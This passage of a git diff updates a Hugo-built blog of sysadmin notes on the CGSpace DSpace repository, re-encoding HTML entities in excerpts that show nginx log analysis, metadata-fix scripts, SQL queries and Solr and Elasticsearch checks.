# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1277694
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;So 4.6 million from XMLUI and another 1.2 million from API requests&lt;/li&gt;
&lt;li&gt;Let&amp;rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot; | grep -c -E &amp;quot;/rest/bitstreams&amp;quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34; | grep -c -E &amp;#34;/rest/bitstreams&amp;#34;
106781
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -620,7 +620,7 @@ COPY 20994
<pubDate>Tue, 01 Oct 2019 13:20:51 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2019-10/</guid>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there is some low-hanging fruit we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unnecessary Unicode&amp;rdquo; fix: $ csvcut -c &#39;id,dc.</description>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there is some low-hanging fruit we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unnecessary Unicode&amp;rdquo; fix: $ csvcut -c &amp;#39;id,dc.</description>
</item>
<item>
@ -634,7 +634,7 @@ COPY 20994
&lt;li&gt;Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning&lt;/li&gt;
&lt;li&gt;Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -645,7 +645,7 @@ COPY 20994
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -761,16 +761,16 @@ DELETE 1
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &amp;#39;Spore-192-EN-web.pdf&amp;#39; | grep -E &amp;#39;(18.196.196.108|18.195.78.144|18.195.218.6)&amp;#39; | awk &amp;#39;{print $9}&amp;#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;In the last two weeks there have been 47,000 downloads of this &lt;em&gt;same exact PDF&lt;/em&gt; by these three IP addresses&lt;/li&gt;
&lt;li&gt;Apply country and region corrections and deletions on DSpace Test and CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 231 -f cg.coverage.region -d
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!&lt;/li&gt;
&lt;li&gt;The top IPs before, during, and after this latest alert tonight were:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;01/Feb/2019:(17|18|19|20|21)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;01/Feb/2019:(17|18|19|20|21)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase&lt;/li&gt;
&lt;li&gt;There were just over 3 million accesses in the nginx logs last month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;quot;[0-9]{1,2}/Jan/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;#34;[0-9]{1,2}/Jan/2019&amp;#34;
3018243
real 0m19.873s
@ -844,7 +844,7 @@ sys 0m1.979s
&lt;li&gt;Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning&lt;/li&gt;
&lt;li&gt;I don&amp;rsquo;t see anything interesting in the web server logs around that time though:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;02/Jan/2019:0(1|2|3)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;02/Jan/2019:0(1|2|3)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -979,7 +979,7 @@ sys 0m1.979s
&lt;li&gt;I added the new CCAFS Phase II Project Tag &lt;code&gt;PII-FP1_PACCA2&lt;/code&gt; and merged it into the &lt;code&gt;5_x-prod&lt;/code&gt; branch (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/379&#34;&gt;#379&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;I proofed and tested the ILRI author corrections that Peter sent back to me this week:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f dc.contributor.author -t correct -m 3 -n
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/&#34;&gt;March, 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Time to index ~70,000 items on CGSpace:&lt;/li&gt;
@ -1073,11 +1073,11 @@ sys 2m7.289s
&lt;li&gt;I notice this error quite a few times in dspace.log:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &amp;quot; &amp;quot;]&amp;quot; &amp;quot;] &amp;quot;&amp;quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &amp;#39;dateIssued_keyword:[1976+TO+1979]&amp;#39;: Encountered &amp;#34; &amp;#34;]&amp;#34; &amp;#34;] &amp;#34;&amp;#34; at line 1, column 32.
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;And there are many of these errors every day for the past month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;quot;Error while searching for sidebar facets&amp;quot; dspace.log.*
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;#34;Error while searching for sidebar facets&amp;#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34
&lt;ul&gt;
&lt;li&gt;Today there have been no hits by CORE and no alerts from Linode (coincidence?)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;quot;CORE&amp;quot; /var/log/nginx/access.log
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;#34;CORE&amp;#34; /var/log/nginx/access.log
0
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;Generate list of authors on CGSpace for Peter to go through and correct:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &amp;#39;contributor&amp;#39; and qualifier = &amp;#39;author&amp;#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1289,7 +1289,7 @@ COPY 54701
&lt;li&gt;Remove redundant/duplicate text in the DSpace submission license&lt;/li&gt;
&lt;li&gt;Testing the CMYK patch on a collection with 650 items:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &amp;quot;ImageMagick PDF Thumbnail&amp;quot; -v &amp;gt;&amp;amp; /tmp/filter-media-cmyk.txt
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &amp;#34;ImageMagick PDF Thumbnail&amp;#34; -v &amp;gt;&amp;amp; /tmp/filter-media-cmyk.txt
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1330,7 +1330,7 @@ COPY 54701
&lt;ul&gt;
&lt;li&gt;An item was mapped twice erroneously again, so I had to remove one of the mappings manually:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# select * from collection2item where item_id = &#39;80278&#39;;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# select * from collection2item where item_id = &amp;#39;80278&amp;#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -1370,11 +1370,11 @@ DELETE 1
&lt;li&gt;CGSpace was down for five hours in the morning while I was sleeping&lt;/li&gt;
&lt;li&gt;While looking in the logs for errors, I see tons of warnings about Atmire MQM:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&amp;quot;dc.title&amp;quot;, transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&amp;quot;THUMBNAIL&amp;quot;, transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&amp;quot;-1&amp;quot;, transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&amp;#34;dc.title&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&amp;#34;THUMBNAIL&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&amp;#34;-1&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;I see thousands of them in the logs for the last few months, so it&amp;rsquo;s not related to the DSpace 5.5 upgrade&lt;/li&gt;
&lt;li&gt;I&amp;rsquo;ve raised a ticket with Atmire to ask&lt;/li&gt;
@ -1429,7 +1429,7 @@ DELETE 1
&lt;li&gt;We had been using &lt;code&gt;DC=ILRI&lt;/code&gt; to determine whether a user was ILRI or not&lt;/li&gt;
&lt;li&gt;It looks like we might be able to use OUs now, instead of DCs:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &amp;quot;dc=cgiarad,dc=org&amp;quot; -D &amp;quot;admigration1@cgiarad.org&amp;quot; -W &amp;quot;(sAMAccountName=admigration1)&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &amp;#34;dc=cgiarad,dc=org&amp;#34; -D &amp;#34;admigration1@cgiarad.org&amp;#34; -W &amp;#34;(sAMAccountName=admigration1)&amp;#34;
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1465,9 +1465,9 @@ $ git rebase -i dspace-5.5
&lt;li&gt;Add &lt;code&gt;dc.description.sponsorship&lt;/code&gt; to Discovery sidebar facets and make investors clickable in item view (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/232&#34;&gt;#232&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;I think this query should find and replace all authors that have &amp;ldquo;,&amp;rdquo; at the end of their names:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &amp;#39;(^.+?),$&amp;#39;, &amp;#39;\1&amp;#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
text_value
------------
(0 rows)
@ -1505,7 +1505,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
&lt;li&gt;I have blocked access to the API now&lt;/li&gt;
&lt;li&gt;There are 3,000 IPs accessing the REST API in a 24-hour period!&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# awk &amp;#39;{print $1}&amp;#39; /var/log/nginx/rest.log | uniq | wc -l
3168
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1603,7 +1603,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
&lt;li&gt;Looks like DSpace exhausted its PostgreSQL connection pool&lt;/li&gt;
&lt;li&gt;Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ psql -c &amp;#39;SELECT * from pg_stat_activity;&amp;#39; | grep idle | grep -c cgspace
78
&lt;/code&gt;&lt;/pre&gt;</description>
</item>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -221,17 +221,17 @@
<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100875,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div>
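<p>For comparison it helps to check the live index too, since a failed harvest can leave the temp and live counts out of sync. A sketch, assuming the permanent index is named <code>openrxv-items</code> as in a default OpenRXV setup:</p>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;
</code></pre>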
<a href='https://alanorth.github.io/cgspace-notes/2021-02/'>Read more →</a>
</article>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -113,17 +113,17 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre>
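<p>To see who is behind those API requests, the same logs can be broken down by user agent. A sketch that assumes nginx&rsquo;s default combined log format, where the agent is the sixth double-quoted field:</p>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | awk -F&#39;&#34;&#39; &#39;{print $6}&#39; | sort | uniq -c | sort -rn | head
</code></pre>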
<a href='https://alanorth.github.io/cgspace-notes/2019-11/'>Read more →</a>
@ -143,7 +143,7 @@
</p>
</header>
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there is some low-hanging fruit we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unnecessary Unicode&rdquo; fix: $ csvcut -c 'id,dc.
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there is some low-hanging fruit we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unnecessary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc.
<a href='https://alanorth.github.io/cgspace-notes/2019-10/'>Read more →</a>
</article>
